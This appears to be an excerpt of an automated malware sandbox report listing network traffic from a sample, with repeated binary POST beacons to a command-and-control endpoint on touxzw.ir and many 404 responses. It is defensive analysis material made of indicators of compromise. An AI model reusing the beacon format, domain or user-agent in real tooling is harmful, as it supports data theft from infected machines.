Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 161Connection: close

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe

Code function: 17_2_00404ED4 recv,

17_2_00404ED4

Source: global traffic

DNS traffic detected: DNS query: touxzw.ir

Source: unknown

HTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 188Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:18:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mOpdltbf2eM1ZrfcdUkylsTacOgNUSdd8yri0CbkLB4xhf1fGMCwbDKdzmWk6XsmYKLGzwSVmWNaWj70qquGpYJ1d%2FWsqFXuOXVjWdRwVSZYkKvrwb6YQ1l9D5A%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3e1cad6242e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1866&min_rtt=1866&rtt_var=933&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=426&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:18:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o8X1Xrvlve5bB8vXtHMLVeKl4yY3qkqHcG3iP9c6JiWo0KQmpfCdou2ELs8Slzbu4KJ6hyrC8Xo4xAjQkcQaX0pwo0LX7cHUGMhwo8pSr5xQrH2LMEi%2FFAAfmF0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3e7349f414a8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2059&min_rtt=2059&rtt_var=1029&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:18:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rWX1HhJqgYnSkjEzcjG9YhG1C8sEeQx2e4K%2BOu8npZgBB12iUNGZQND0FqYEsQcIH8IQ%2BAW1c%2BcMjEbUEDiqru82KwaIPMKYn6o%2BIhNefOwChnjmEA6qNmxeJWg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3e81e8d7de95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=119&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:18:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hp6uk%2Bf2Bjk4EA8U1myYklbj2idqIGc%2B6%2Fif%2FbLHqI9zvb%2BrTWzq2E4rhgF%2BUC8vq0Wt%2BWqh%2FjlkF4C%2F14k4bruzGBqPfAu3ep%2B9yiIAB9ps5b%2FrfDoSRsQYYiM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3e87d93c8ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1941&rtt_var=970&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:18:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1z2Vg%2FATp6XBqphNZSWSMaM261oDWgXS8qH2a7rQNk8r2e%2FK5J%2B2VT%2FWprsRBIr1YJJ2C4dMBoKJKYkZZgZj5b2vW8Sa122ng7le3%2BQq%2FbVM4a4lKi%2BUPUHqrM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3e8dad18de95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1645&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=119&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:18:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFKd2x7dxeJj%2B2g4nKBp4tzOavgCIab31SWmrOCrgvHgQLcCP0kn5570%2BxCT4WtuYEzqQGLslrNcVnt%2Bg%2BmasR%2BQEjTZDMrHyDVhjVGQ3PhPnaxsm%2FGbnMiOqI0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3e9389888ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1896&min_rtt=1896&rtt_var=948&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:18:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=afBZSsb3Y%2B5DRIGreUKD1k99IvLvlkcz4YYpz5llXIM%2BB7rLGgvMfhueXUg1mKxr9oNce2B7qC1hBkci%2BJlRwyHpZ85KPosJRKOsuI0EYEaTDGtrKVN0%2Bq3jvpo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3ea5f9a8de95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1632&rtt_var=816&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=119&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:18:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JkVgsxxCWMpCvcCY6I2kfrfZag9MO2HkX4jY2zUARx0nUAd%2FbrgOWqmJfw6iqEeliNuiI2CUHOkSujYmg7jL%2BzFUJDzKr3WV9vR9tMmwqtfkjllfnIG0nXWXijA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3ead8d2f14a8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1954&rtt_var=977&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:18:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2BvUb99aUGtOoDKoqYSWPGcaC%2FRtsLkyf1aGJy9vygFjdU%2BNUZs%2B0l9lmO9VzWj5N8FirUhSOZCkCR3d5TBApqQFbNNvAW7khao%2B8IOtgGp8DIKhaMFf1rEdfAE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3eb8d82dde95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1695&rtt_var=847&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=119&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:18:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkyk%2FOL3gzdx0JnJXOzDyqCDVgOM2cNVtyh6wmcPPXRdvlgh1vU2iYThz2KMgvEAUfa1o6C670imy%2FaeI3pzULv78eh08G%2FIxiYXrszUM5EYXCCBy3K%2F9PX3%2FqY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3ebffe9e7c6a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1969&rtt_var=984&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:18:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sBIn%2Bd%2BFNhZ2kl0%2FRubk%2BIP62SSBkKJOWUIb9E2hSo5N3RaZR0KOrvgBz0Z68Y7acwDAnEm%2Bu9%2Fp5%2F2oOpxWQsvUp%2BklowanwnbdR80Ag1XuXJPAz6X0fk8nzJs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3ec5c9754414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1787&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:18:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2F6DvVXSZ3zVSKoBFIIR6cV3EOtmm4JBurwAZrxrMVqc%2Bcks%2FW8FdV9dYClg%2Bt8amUj4oPJXvsfHhci8kjY8n8smDWJRJEuNakEhTy1RAyT1%2B%2FuZD9jT5YAnOB8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3ecb9ea94414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1593&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:18:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2F4LHAw%2BRF8TB6Awnjsz%2FQWArwGm11jSVq1nkM%2Bhh1mcgu5MKOv9nXWSHEA7mfHyZRX5mUoZgM5NVHiDcHw0yhStj9vdF2XuKgElO6JdprZ8Me%2FJo3nhPPf2xxM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3edcaf28c358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1590&rtt_var=795&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=82VjVRMCgO4j0HcIbbc4iQB42q6Tfv9CBM5yKbK3Uv6so02%2B%2Fo%2FxS4A7wBWS15ICVowSMl4R6Geqdggale88paw7c8C%2BoagSLarny%2Bbpm1iuyaSQ6YqZHv1Wcwk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3eff39f3c358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1634&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fVXe9HNyGTN68k66ctK0c63OzkmgPVtsGBiCRAUmvO%2BuQoFEgu8qdEhH5Gkuqn9ofZHfFwQJa7lMYKGR569KXkoiZs%2Bw5F%2FxHMDdai4Os9CRLxKfjUsG1Lp776I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3f0cff984414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NGRDuBPAl9SSlvSl5oO5pRDK0E%2FYc3%2Br%2Bng0uvOwt6yBggeKt2VoDTMoJR4HxY8tVDM%2F5SoqyMOOAusBjHVbKCIgLvG2wbgrO7Og34FAUNb0y7TUBBZY5pX%2FQMg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3f12ebab14a8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1995&rtt_var=997&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AfSxQaQLWqt74B831FzJpqS5RyKWjEqGOIt8%2FonXqn7Ub5k7%2BxBVsNpfWU1nAL4Jc6MTLXN9%2BHUITe4fk6sTb055pWqNlQpnDkKVosr0jFh9gPkPEBALDfZyrj0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3f245e0fc358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nxofm7%2FSrfXnFdN%2F7s1twy5nzGiU16e1IB%2BXZFMU8ljBX5rM7LkqRFNEVyD7xcv65mNyfsMlM%2FuDpqK4pGWSfI29tkLLSvE%2B8wJucY%2FjGOp033v724fPCEwuY5Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3f2a3e4242e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1723&rtt_var=861&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cx94ntCCUKNXtM%2BoW7tj0RVGKY%2FUMGS7uj2YoHx4mkx%2F16R708JJkH2JmppJ%2BTri4Wd484LjxQfy7GS3aF7b0FKHnrFABWUUbeW4cc9HydUuCmJoyFR%2Bs%2FTTXzs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3f302dda4414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1678&rtt_var=839&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ukI%2B34CXhAA9Ddnw7eeZvMwlcszcgSxL9gmxsfziYUv3AovysCpmb7Gg6s%2Bx6SM9pJUYjGC0gUvZxVBUhMYgJxsPd8U%2FbgL%2FDjN0bqVCI6gRIjfbgBwgmJWmOXY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3f367eca8ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2368&min_rtt=2368&rtt_var=1184&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BiZsy1jge6J7qiWNWz4JMvmSjo9r0jszVYGnelLxbhZek9YUC5LQhqW6yUp4jvZnAIjn%2BZXmXIzBBvM5PQ3o%2FUWqtTClCbsVXOCv6U6wkias9mNEtI56G%2FWCfTA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3f3cdba58ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1965&rtt_var=982&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEjHNLkuuP9pPlbxsiVDsGJj7SutN9RLP11SEEG%2F4Cb3g1Pl54h%2BG7a%2BH091pGbIJ1cz6lSrsC3Z2kWdgdIpc2BRz5gE8XA%2F3L773%2FgYa7YwJyBUD%2F4Q9yUqWss%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3f43391f42e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=6480&min_rtt=6480&rtt_var=3240&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkS%2FfBNxqq2hGcHak0Peu7m%2F1ljrcAnm0%2FaryPxsFNVmSaGu6sq%2FOVvuKZQPWDUa8KKWLlHcQkqLGaw0XocLs94x7KkHL%2BD5PQ7s38WinJKz5g4ePF2AO%2BqxcCE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3f4ace0c8ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: 